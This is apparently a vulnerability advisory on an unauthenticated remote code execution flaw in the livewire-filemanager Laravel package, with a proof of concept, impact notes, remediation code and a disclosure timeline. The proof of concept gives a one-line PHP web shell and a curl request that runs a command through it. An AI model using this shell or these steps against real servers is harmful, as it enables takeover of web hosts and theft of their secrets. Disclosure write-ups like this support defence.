Unauthenticated RCE in Livewire Filemanager (CVE-2025-14894)

  • Jan 8

Updated: Jan 28


Date: January 16, 2026

Author: HackingByDoing

Vendor: livewire-filemanager (Bee Interactive / Laravel)

CVSS Score: 9.8 (Critical)


Executive Summary

I recently discovered a critical vulnerability in the livewire-filemanager package, a file management tool designed for Laravel applications. The vulnerability allows an unauthenticated attacker to upload arbitrary files, including PHP scripts, to the server.


Because these files are stored in a public directory by default, an attacker can execute the uploaded scripts via the web browser, achieving Remote Code Execution (RCE) on the host system.


Technical Analysis

Root Cause: Missing File Type Validation

The core issue lies within the LivewireFilemanagerComponent.php component. The application handles file uploads without performing sufficient validation on the file type, MIME type, or file extension.


When a file is uploaded via the UI, the backend processes it using a logic flow similar to this:

$this->currentFolder
    ->addMedia($file->getRealPath())
    ->usingName($file->getClientOriginalName());

As seen above, no mimes: validation rule and no filename whitelist is applied before the file is stored.


The Execution Vector: storage:link

By default, the package stores uploaded files in the storage/app/public directory. In the Laravel ecosystem, it is standard practice (and often a requirement for serving media) to run the following command:


php artisan storage:link

This command creates a symbolic link from public/storage to storage/app/public, making the uploaded files directly accessible via the web server.


Because the file manager does not rename files to safe hashes or restrict dangerous extensions (like .php), an attacker can simply browse to the URL of their uploaded shell to execute it.


Proof of Concept (PoC)

An attacker can exploit this vulnerability without any credentials by following these steps:


1. Create a Malicious Payload

Create a simple PHP web shell named shell.php.

<?php echo "RCE:".shell_exec($_GET['cmd']); ?>

2. Upload via the Interface

Using the livewire-filemanager UI, upload shell.php. The system accepts the file without error.

3. Locate the File

The file is typically stored in a predictable path, such as:


storage/app/public/{folder_id}/shell.php


4. Execute Remote Code

Access the file via the public URL to trigger the execution.


curl "http://127.0.0.1:8000/storage/{folder_id}/shell.php?cmd=id"


Response:

RCE: uid=33(www-data) gid=33(www-data) groups=33(www-data)


Impact

  • Attack Vector: Network

  • Privileges Required: None

  • Confidentiality, Integrity, Availability: High

This is a full RCE vulnerability. An attacker can gain control of the web server user (www-data), read sensitive configuration files (like .env), modify data, or pivot to other internal systems.


Remediation & Mitigation

Users of livewire-filemanager are strongly advised to take one of the following actions immediately:

  1. Remove the Package: If possible, uninstall the package until a security patch is released.

  2. Disable Public Access: Remove the symbolic link created by php artisan storage:link if it is not strictly required for other parts of your application.

  3. Manual Patching: You can manually enforce validation in the component by adding strict rules for allowed MIME types (e.g., images only) and ensuring files are saved with randomized hashes rather than their original filenames.

// Example Validation Fix
$this->validate([
    'files.*' => 'file|mimes:jpg,jpeg,png,pdf|max:20480'
]);
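The validation rule above stops most dangerous uploads but still stores files under their client-supplied names. The following is an added example, not code from the livewire-filemanager package, of a Livewire upload method that combines the three controls the remediation step calls for: a server-side mimes: rule, an explicit MIME-to-extension allowlist derived from the file's detected content type, and a random stored filename passed to spatie/laravel-medialibrary's usingFileName(). The component name, the $files property, the $currentFolder model and the 'uploads' collection name are assumptions for illustration.

```php
<?php
// Added example (not the package's own code): a hardened Livewire upload handler.
// Assumes $currentFolder is a model implementing Spatie\MediaLibrary\HasMedia
// and that the Livewire form binds uploads to $files (both names assumed).

namespace App\Livewire;

use Illuminate\Support\Str;
use Livewire\Component;
use Livewire\WithFileUploads;

class HardenedUploadComponent extends Component
{
    use WithFileUploads;

    /** @var array Temporary uploaded files bound from the form (assumed property). */
    public array $files = [];

    /** @var mixed The folder model that receives the media (assumed property). */
    public $currentFolder;

    // Only content types we are willing to serve from a public directory.
    // The stored extension is taken from this map, never from the client name,
    // so "shell.php", "shell.php.jpg" or "shell.phtml" can never be persisted as such.
    private const ALLOWED_MIME_TO_EXT = [
        'image/jpeg'      => 'jpg',
        'image/png'       => 'png',
        'image/gif'       => 'gif',
        'application/pdf' => 'pdf',
    ];

    public function upload(): void
    {
        // 1. Laravel's `mimes` rule checks the extension guessed from the file's
        //    content, not the name the browser sent, so it already rejects PHP
        //    sources disguised with an image extension.
        $this->validate([
            'files'   => 'required|array|max:10',
            'files.*' => 'required|file|mimes:jpg,jpeg,png,gif,pdf|max:20480',
        ]);

        foreach ($this->files as $file) {
            // 2. Independent check: detect the MIME type from content (finfo) and
            //    map it to an allowlisted extension. Anything unmapped is refused.
            $extension = self::ALLOWED_MIME_TO_EXT[$file->getMimeType()] ?? null;
            if ($extension === null) {
                $this->addError('files', 'File type not permitted.');
                continue;
            }

            // 3. Store under a random name with the validated extension. The
            //    original name survives only as display metadata in the database,
            //    stripped of any path or extension, never as the on-disk filename.
            $displayName = pathinfo($file->getClientOriginalName(), PATHINFO_FILENAME);
            $storedName  = Str::random(40) . '.' . $extension;

            $this->currentFolder
                ->addMedia($file->getRealPath())
                ->usingName($displayName)
                ->usingFileName($storedName)
                ->toMediaCollection('uploads');
        }

        // Clear the temporary uploads once they have been persisted.
        $this->files = [];
    }

    public function render()
    {
        return view('livewire.hardened-upload');
    }
}
```

Even with this in place, the directory behind public/storage should be served with script execution disabled (for example, a web server rule that refuses to hand .php files under /storage to the PHP handler), so that a future validation bypass cannot turn a stored file back into an execution vector.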

Disclosure Timeline

  • 2025-10-08: Vulnerability reported to CERT/CC.

  • 2025-10-14: Initial attempt to contact vendor.

  • 2025-11-03: Follow-up attempts (No response).

  • 2026-01-16: Public disclosure via CERT/VINCE and this advisory.
